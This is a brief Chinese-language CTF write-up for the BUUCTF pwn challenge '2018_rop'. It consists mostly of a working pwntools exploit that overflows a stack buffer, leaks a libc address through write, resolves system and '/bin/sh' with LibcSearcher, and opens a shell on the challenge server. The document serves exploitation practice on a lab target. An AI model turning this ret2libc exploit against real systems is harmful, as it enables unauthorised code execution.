BUUCTF-PWN-铁人三项(第五赛区)_2018_rop
checksec
IDA
be_nice_to_people
函数不知道在干什么,这道题好像也不需要管
vulnerable_function
函数中有一个溢出点
所以这题的思路是用write
函数来计算system
函数和binsh
的地址
EXP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27
| from pwn import * from LibcSearcher import *
context.log_level = 'debug'
p = remote('node4.buuoj.cn', 29883)
elf = ELF('./2018_rop')
main_addr = elf.sym['main'] print(hex(main_addr)) write_plt = elf.plt['write'] write_got = elf.got['write']
p.sendline(flat(b'a' * (0x88 + 0x4), p32(write_plt), p32(main_addr), p32(1), p32(write_got), p32(4))) write_addr = u32(p.recv(4)) print(hex(write_addr))
libc = LibcSearcher('write', write_addr) libc_base = write_addr - libc.dump('write') system_addr = libc_base + libc.dump('system') binsh_addr = libc_base + libc.dump('str_bin_sh')
p.sendline(flat(b'a' * (0x88 + 0x4), p32(system_addr), p32(main_addr), p32(binsh_addr)))
p.interactive()
|
结果
从上往下尝试,0不行,到1的时候就可以了